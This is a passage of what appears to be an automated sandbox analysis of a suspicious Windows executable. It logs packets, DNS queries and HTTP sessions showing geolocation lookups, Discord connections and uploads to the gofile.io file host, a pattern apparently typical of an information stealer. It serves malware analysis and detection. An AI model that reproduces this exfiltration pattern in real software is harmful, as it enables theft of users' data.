                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404838085 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404939890 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.451339006 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.641740084 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.641875982 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.641952038 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.645195961 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.645226002 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727030993 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727077961 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727157116 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727941036 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727955103 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.335365057 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.336114883 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.336169958 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.337204933 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.337286949 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338210106 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338287115 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338624954 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338644028 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338716030 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.379349947 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.606543064 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.606616974 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.606839895 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.607382059 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.607425928 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.889046907 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.893882036 CET8049776208.95.112.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.894360065 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.894871950 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.899597883 CET8049776208.95.112.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.499113083 CET8049776208.95.112.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.500260115 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.505718946 CET8049776208.95.112.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.505786896 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.094146967 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.094199896 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.094285011 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.095227957 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.095244884 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.703792095 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.704350948 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.704360008 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.705348015 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.705411911 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.706552029 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.706614017 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.706979036 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.706985950 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.707091093 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.747333050 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.871304989 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.960221052 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.960521936 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.960587978 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.961215019 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.961234093 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.963757038 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.963851929 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.963933945 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.964580059 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.964616060 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.573920012 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.574624062 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.574686050 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.578468084 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579071999 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579560995 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579699993 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579713106 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579757929 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.581140041 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.581178904 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.581413984 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.581480980 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.581907988 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.581958055 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582113028 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582158089 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582333088 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582381964 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582560062 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582624912 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582658052 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582670927 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582806110 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582842112 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582886934 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582906961 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.582990885 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.583044052 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.591767073 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.600330114 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.643322945 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:44.441538095 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:44.441838980 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:44.441910982 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:44.442447901 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:44.442476034 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.110152006 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.110167980 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.110219002 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.110944033 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.110953093 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.951632977 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.952109098 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.952124119 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.953145981 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.953207970 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.954363108 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.954416037 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.954704046 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.954714060 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.004681110 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.204943895 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.205005884 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.205064058 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.205719948 CET49927443192.168.2.1045.112.123.126
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.205729961 CET4434992745.112.123.126192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.455967903 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.456001043 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.456213951 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.456707001 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.456717014 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.301311970 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.302031994 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.302040100 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.303050041 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.303119898 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.303987980 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.304048061 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.304363012 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.304558039 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.304563046 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.304955006 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.304965019 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.304984093 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.305200100 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.305229902 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.307126999 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:48.307136059 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.395828009 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.395917892 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.396409035 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.397528887 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.397528887 CET49935443192.168.2.1045.112.123.227
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.397543907 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.397552013 CET4434993545.112.123.227192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.647177935 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.647219896 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.647702932 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.650718927 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:50.650739908 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.286957026 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.287503958 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.287518978 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.288497925 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.288564920 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.289769888 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.289832115 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.290137053 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.290142059 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.290225029 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.331383944 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.332811117 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.532635927 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.532751083 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.532807112 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.533359051 CET49953443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:51.533375978 CET44349953162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.901212931 CET6550653192.168.2.101.1.1.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.908179998 CET53655061.1.1.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.725461006 CET6236053192.168.2.101.1.1.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.732328892 CET53623601.1.1.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.848252058 CET5554353192.168.2.101.1.1.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.855205059 CET53555431.1.1.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.101866961 CET6397953192.168.2.101.1.1.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.109077930 CET53639791.1.1.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.447783947 CET6138253192.168.2.101.1.1.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.454961061 CET53613821.1.1.1192.168.2.10
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.901212931 CET192.168.2.101.1.1.10x7a5aStandard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.725461006 CET192.168.2.101.1.1.10x1992Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.848252058 CET192.168.2.101.1.1.10xa2a4Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.101866961 CET192.168.2.101.1.1.10x2496Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.447783947 CET192.168.2.101.1.1.10xbb67Standard query (0)store1.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:13.908179998 CET1.1.1.1192.168.2.100x7a5aNo error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.732328892 CET1.1.1.1192.168.2.100x1992No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.732328892 CET1.1.1.1192.168.2.100x1992No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.732328892 CET1.1.1.1192.168.2.100x1992No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.732328892 CET1.1.1.1192.168.2.100x1992No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.732328892 CET1.1.1.1192.168.2.100x1992No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.855205059 CET1.1.1.1192.168.2.100xa2a4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:46.109077930 CET1.1.1.1192.168.2.100x2496No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:47.454961061 CET1.1.1.1192.168.2.100xbb67No error (0)store1.gofile.io45.112.123.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        • geolocation-db.com
                                                                                                                                                                                                                                        • discord.com
                                                                                                                                                                                                                                        • api.gofile.io
                                                                                                                                                                                                                                        • store1.gofile.io
                                                                                                                                                                                                                                        • ip-api.com
                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.1049776208.95.112.1808168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.894871950 CET124OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.499113083 CET468INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:20 GMT
                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 291
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Ttl: 60
                                                                                                                                                                                                                                        X-Rl: 44
                                                                                                                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39 22 7d
                                                                                                                                                                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.89"}


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.1049734159.89.102.2534438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:15 UTC126OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                        Host: geolocation-db.com
                                                                                                                                                                                                                                        User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-11-15 09:46:15 UTC211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:15 GMT
                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                        Content-Length: 194
                                                                                                                                                                                                                                        Location: https://geolocation-db.com/json/
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-11-15 09:46:15 UTC194INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.1049741159.89.102.2534438168C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-11-15 09:46:16 UTC127OUTGET /json/ HTTP/1.1
                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                        Host: geolocation-db.com
                                                                                                                                                                                                                                        User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-11-15 09:46:16 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:16 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
